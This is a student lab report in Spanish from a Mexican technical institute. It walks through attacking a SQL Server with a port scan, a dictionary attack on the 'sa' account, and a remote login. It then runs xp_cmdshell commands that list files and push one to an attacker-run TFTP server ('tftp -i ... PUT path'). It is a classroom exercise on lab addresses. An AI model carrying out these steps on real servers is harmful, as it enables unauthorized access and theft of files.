Practica 1 sql server entregable

Av. Tecnológico No. 2, Col. Centro, C.P. 76800 San Juan del Río, Qro. Conmutador: (01) 427 27 2 85 46, 427 27 2 41 18 Ext. 123

www.itsanjuan.edu.mx

TECNOLÓGICO NACIONAL DE MÉXICO Instituto Tecnológico de San Juan del Río

Instituto Tecnológico de San Juan del Río

PRÁCTICA 1:

SQL Server

P R E S E N T A:

Ruiz Arrazola María del Carmen 12590172

P R O F E S O R (A):

Rojo López Ariopajita

San Juan del Río, Qro., Abril de 2015

http://www.itsanjuan.edu.mx/

Av. Tecnológico No. 2, Col. Centro, C.P. 76800

San Juan del Río, Qro. Conmutador: (01) 427 27 2 85 46, 427 27 2 41 18 Ext. 123 www.itsanjuan.edu.mx

SQL Server

Objetivos Identificar la presencia de un servidor SQL Server mediante el uso de software de scanner

de puertos.

Efectuar un ataque por diccionario para encontrar la contraseña de la cuenta “sa”.

Conectarse y controlar en forma remota el servidor.

Instalar un servidor TFTP en la computadora atacante.

Ejecutar comandos del sistema operativo desde SQL Server.

Introducción: Basado en pruebas de infiltración reales que hemos efectuado sobre nuestros clientes desde

internet. La metodología también es muy similar a la usada para hackear a Microsoft cuando le

robaron parte del código fuente de Windows XP. En este incidente, uno de los programadores de

bases de datos tenía una contraseña sencilla en su equipo, que fue explotada por los atacantes como

se describe a continuación.

Material y equipo necesario 1Computadora con windows Conectar a la red de internet

Metodología

Fase 1. En este ejercicio, se instalará y ejecutará el software Superscan para identificar el puerto TCP

abierto que indica la presencia de un servidor SQL activo en la red.

1-Instalar superscan.exe





2.- Ejecutar superscan y anotar la direccíon del servidor mysql 127.0.0.1

Esta dirección debe ser la misma en los campos IP Start y Stop.

En Scan Type, seleccione All list ports from 1-5000.

3.- Iniciar el SCANNER.

4.- Comprobar que el scanner identifica correctamente el puerto 1433.





Fase 2.

En este ejercicio, se utilizará la herramienta SQLDict, montando un ataque por diccionario para

encontrar la contraseña de acceso de la cuenta administrativa “sa”.

1.- Ejecute el programa sqldict.exe.

2.-En el campo Target server IP, introduzca 127.0.0.1

3.-En el campo Target Account, asegúrese que se encuentra sa por default.

4.-Seleccione Load Password File

5.-Navegue a su USB, localice y seleccione el archivo passwords.txt.





Fase 3.

En este ejercicio, se usara las herramientas administrativas Management Studio para conectarse a

un servidor y, aprovechando la existencia de una cuenta de login que se instala por default, obtener

el control total del servidor de bases de datos, en forma remota y con privilegios administrativos.

Tarea Pasos Detallados

1. Configurar la herramienta

Enterprise Manager,

conectarse al servidor y

controlarlo en forma remota.

a. Ejecute la herramienta administrativa Management

Studio en el menú Start | Programs | Microsoft

SQL Server 2005 | SQL Server Management

Studio Express

b. En Nombre de servidor, introduzca 192.168.1.100

c. En Autenticación, seleccione Autenticación de

SQL Server. Introduzca la cuenta sa, con la

contraseña que crackeo en el ejercicio anterior. Haga

click en Conectar.

Fase 4.

En este ejercicio, se instalará un servidor TFTP en la computadora atacante para permitir la

recepción y envío de archivos sin autenticación. Este software es necesario debido a que el sistema

operativo Windows contiene un cliente TFTP, pero no el componente servidor.


1. Instalar un servidor TFTP a. Inserte la memoria USB.

b. Abra el explorador de Windows, y navegue a la

ubicación del software TFTP Server:

Carpeta HERRAMIENTAS SQL

c. Ejecute el software instalador de TFTP Server,

SolarWinds-TFTP-Server.exe, aceptando las

opciones por default que presenta el asistente. Si le

solicita el CD de instalación de Microsoft Office,

presione Cancelar.

d. En la opción File – Configure, seleccione la pestaña

Security, activando la opción “Transmit and

Receive files”. Presione “OK”.





Fase 5.

En este ejercicio, se empleará la herramienta administrativa Query Analizer para conectarse al

servidor remoto y ejecutar comandos del sistema operativo para navegar el disco duro. Este

escenario simula la presencia de un archivo en el servidor que nos interesa encontrar y transferir

hacia la computadora atacante.


1. Conectarse al servidor

remoto

a. En SQL Server Management Studio, selecciona

Nueva consulta.

2. Ejecutar el extended stored

procedure xp_cmdshell para

buscar y transferir un

archivo hacia el hacker

a. En la ventana de consultas, introduzca y ejecute el

siguiente comando para localizar cualquier archivo

de texto que usaremos como ejemplo.

xp_cmdshell ‘dir c:\*.txt /s’

b. Active el servidor TFTP en la computadora atacante:

menú Start | Programs | SolarWinds 2001

Standard Edition | File Transfer | TFTP Server.

c. Transfiera el archivo encontrado hacia el equipo

cliente, ejecutando el siguiente stored procedure:

xp_cmdshell ‘tftp –i 192.168.1.# PUT path’

Sustituya # por el número de estudiante que usted tiene

asignado. Sustituya la palabra path por la ruta completa

del archivo encontrado en el punto “a”. Si la ruta

contiene espacios en blanco, necesita incluirla entre

comillas “ ”.

Por ejemplo, si el archivo que desea transferir es

c:\program files\test.txt, ejecute:

xp_cmdshell ‘tftp -i 192.168.1.# PUT “c:\program files\test.txt”’

d. Verifique que el archive se transfirió hacia la

computadora atacante, revisando el contenido del

directorio c:\TFTP-root (el directorio que se

configure por default para enviar y recibir archives

por TFTP).


Practica 1 sql server entregable

Education

Transcript of Practica 1 sql server entregable